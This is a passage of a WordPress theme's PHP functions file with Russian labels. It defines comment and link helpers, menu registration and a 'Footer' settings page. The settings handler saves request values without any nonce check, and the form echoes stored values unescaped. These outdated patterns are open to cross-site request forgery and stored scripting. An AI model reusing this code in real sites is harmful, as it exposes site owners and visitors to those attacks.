		ob_start();
		previous_comments_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_comments_link')) {
	function get_next_comments_link($label)
	{
		ob_start();
		next_comments_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_previous_posts_link')) {
	function get_previous_posts_link($label)
	{
		ob_start();
		previous_posts_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_posts_link')) {
	function get_next_posts_link($label)
	{
		ob_start();
		next_posts_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_previous_post_link')) {
	function get_previous_post_link($label)
	{
		ob_start();
		previous_post_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_post_link')) {
	function get_next_post_link($label)
	{
		ob_start();
		next_post_link($label);
		return ob_get_clean();
	}
}

function art_get_comment_author_link(){
    ob_start();
    comment_author_link();    
    return ob_get_clean();
}

function art_get_edit_comment_link(){
    ob_start();
    edit_comment_link('('.__('Редактировать', THEME_NS).')','  ','');
    return  ob_get_clean();
}

function art_get_comment_text(){
    ob_start();
    comment_text();
    return  ob_get_clean();
}

function art_get_comment_reply_link($args, $depth){
    ob_start();
    comment_reply_link(array_merge( $args, array('depth' => $depth, 'max_depth' => $args['max_depth'])));
    return  ob_get_clean();
}


function art_comment($comment, $args, $depth)
{
	 $GLOBALS['comment'] = $comment; ?>
    <li <?php comment_class(); ?> id="li-comment-<?php comment_ID() ?>">
     <div id="comment-<?php comment_ID(); ?>">
<?php  art_post_box('',  art_parse_template("comment", array(
		'get_avatar'          =>   get_avatar($comment, $size='48'),
		'comment_author_link' =>   art_get_comment_author_link(),
		'status'              =>   $comment->comment_approved == '0' ?  '<em>' . __('Ваш комментарий ожидает модерации.', THEME_NS) . '</em><br />' : '',
		'get_comment_link'    =>   htmlspecialchars( get_comment_link( $comment->comment_ID ) ) ,
		'get_comment_date'    =>   sprintf(__('%1$s at %2$s', THEME_NS), get_comment_date(),  get_comment_time()),
		'edit_comment_link'   =>   art_get_edit_comment_link(),
		'comment_text'        =>   art_get_comment_text(),
		'comment_reply_link'  =>   art_get_comment_reply_link($args, $depth)))); ?>      
     </div>
<?php
}

add_filter('comments_template', 'legacy_comments');  
function legacy_comments($file) {  
    if(!function_exists('wp_list_comments')) : // WP 2.7-only check  
    $file = TEMPLATEPATH.'/legacy-comments.php';  
    endif;  
    return $file;  
} 

if ( function_exists('add_theme_support') ) {
	add_theme_support('post-thumbnails');
  add_theme_support('nav-menus');
  add_theme_support('automatic-feed-links');
}

if (function_exists('register_nav_menus')) {
    register_nav_menus(
		array(
			'primary-menu'   =>   __( 'Primary Menu', THEME_NS),
			'secondary-menu' =>   __( 'Secondary Menu', THEME_NS)
		)
	);
}
 

function art_add_admin() {
	global $options;
  if ( $_GET['page'] == basename(__FILE__) ) {
    if ('save' == $_REQUEST['action'] ) {
      foreach ($options as $value) {
          if($value['type'] != 'multicheck'){
            art_update_option( $value['id'], $_REQUEST[ $value['id'] ] );
          }else{
            foreach($value['options'] as $mc_key => $mc_value){
              $up_opt = $value['id'].'_'.$mc_key;
              art_update_option($up_opt, $_REQUEST[$up_opt] );
            }
          }
      }
      foreach ($options as $value) {
          if($value['type'] != 'multicheck'){
            if( isset( $_REQUEST[ $value['id'] ] ) ) { art_update_option( $value['id'], $_REQUEST[ $value['id'] ]  ); } else { delete_option( $value['id'] ); }
          }else{
            foreach($value['options'] as $mc_key => $mc_value){
              $up_opt = $value['id'].'_'.$mc_key;
              if( isset( $_REQUEST[ $up_opt ] ) ) { art_update_option( $up_opt, $_REQUEST[ $up_opt ]  ); } else { delete_option( $up_opt ); }
            }
          }
      }
      header("Location: themes.php?page=functions.php&saved=true");
      die;
    } 
  }
  add_theme_page("Footer", "Footer", 'edit_themes', basename(__FILE__), 'art_admin');
}
add_action('admin_menu', 'art_add_admin');

     
	
function art_update_option($key, $value){
	update_option($key, (get_magic_quotes_gpc()) ? stripslashes($value) : $value);
}


function art_admin() {
    global $options;
    if ( $_REQUEST['saved'] ) echo '<div id="message" class="updated fade"><p><strong>'.art_option('theme.name') . ' settings saved.</strong></p></div>';
?>
<div class="wrap">
	<h2>Footer</h2>

	<form method="post">

		<table class="optiontable" style="width:100%;">

<?php foreach ($options as $value) {
   
    switch ( $value['type'] ) {
        case 'text':
        option_wrapper_header($value);
        ?>
                <input style="width:100%;" name="<?php echo $value['id']; ?>" id="<?php echo $value['id']; ?>" type="<?php echo $value['type']; ?>" value="<?php if ( get_settings( $value['id'] ) != "") { echo get_settings( $value['id'] ); } else { echo $value['std']; } ?>" />
        <?php
        option_wrapper_footer($value);
        break;
       
        case 'select':
        option_wrapper_header($value);
        ?>
                <select style="width:70%;" name="<?php echo $value['id']; ?>" id="<?php echo $value['id']; ?>">
                    <?php foreach ($value['options'] as $option) { ?>
                    <option<?php if ( get_settings( $value['id'] ) == $option) { echo ' selected="selected"'; } elseif ($option == $value['std']) { echo ' selected="selected"'; } ?>><?php echo $option; ?></option>
                    <?php } ?>
                </select>
        <?php
        option_wrapper_footer($value);
        break;
       
        case 'textarea':
        $ta_options = $value['options'];
        option_wrapper_header($value);
        ?>
                <textarea name="<?php echo $value['id']; ?>" id="<?php echo $value['id']; ?>" style="width:100%;height:100px;"><?php
                if( get_settings($value['id']) !== false) {
                        echo stripslashes(get_settings($value['id']));
                    }else{
                        echo $value['std'];
                }?></textarea>
        <?php
        option_wrapper_footer($value);
        break;

        case "radio":
        option_wrapper_header($value);
       
        foreach ($value['options'] as $key=>$option) {
                $radio_setting = get_settings($value['id']);
                if($radio_setting != ''){
                    if ($key == get_settings($value['id']) ) {
                        $checked = "checked=\"checked\"";
                        } else {
                            $checked = "";
                        }
                }else{
                    if($key == $value['std']){
                        $checked = "checked=\"checked\"";
                    }else{
                        $checked = "";
                    }
                }?>
                <input type="radio" name="<?php echo $value['id']; ?>" value="<?php echo $key; ?>" <?php echo $checked; ?> /><?php echo $option; ?><br />
        <?php
        }
        
        option_wrapper_footer($value);
        break;
       
        case "checkbox":
        option_wrapper_header($value);
                        if(get_settings($value['id'])){
                            $checked = "checked=\"checked\"";
                        }else{
                            $checked = "";
                        }
                    ?>
                    <input type="checkbox" name="<?php echo $value['id']; ?>" id="<?php echo $value['id']; ?>" value="true" <?php echo $checked; ?> />
        <?php
        option_wrapper_footer($value);
        break;

        case "multicheck":
        option_wrapper_header($value);
       
        foreach ($value['options'] as $key=>$option) {
                 $pn_key = $value['id'] . '_' . $key;
                $checkbox_setting = get_settings($pn_key);
                if($checkbox_setting != ''){
                    if (get_settings($pn_key) ) {
                        $checked = "checked=\"checked\"";
                        } else {
                            $checked = "";
                        }
                }else{
                    if($key == $value['std']){
                        $checked = "checked=\"checked\"";
                    }else{
                        $checked = "";
                    }
                }?>
                <input type="checkbox" name="<?php echo $pn_key; ?>" id="<?php echo $pn_key; ?>" value="true" <?php echo $checked; ?> /><label for="<?php echo $pn_key; ?>"><?php echo $option; ?></label><br />
        <?php
        }
        
        option_wrapper_footer($value);
        break;
       
        case "heading":
        ?>
        <tr valign="top">
            <td colspan="2" style="text-align: center;"><h3><?php echo $value['name']; ?></h3></td>
        </tr>
        <?php
        break;
       
        default:

        break;
    }
}
?>

		</table>

		<p class="submit">
			<input name="save" type="submit" value="Сохранить" />
			<input type="hidden" name="action" value="save" />
		</p>
	</form>
</div>
<?php
}

function option_wrapper_header($values){
    ?>
    <tr valign="top">
        <th scope="row" style="width:1%;white-space: nowrap;"><?php echo $values['name']; ?>:</th>
        <td>
    <?php
}

function option_wrapper_footer($values){
    ?>
        </td>
    </tr>
    <tr valign="top">
        <td>&nbsp;</td><td><small><?php echo $values['desc']; ?></small></td>
    </tr>
    <?php
}
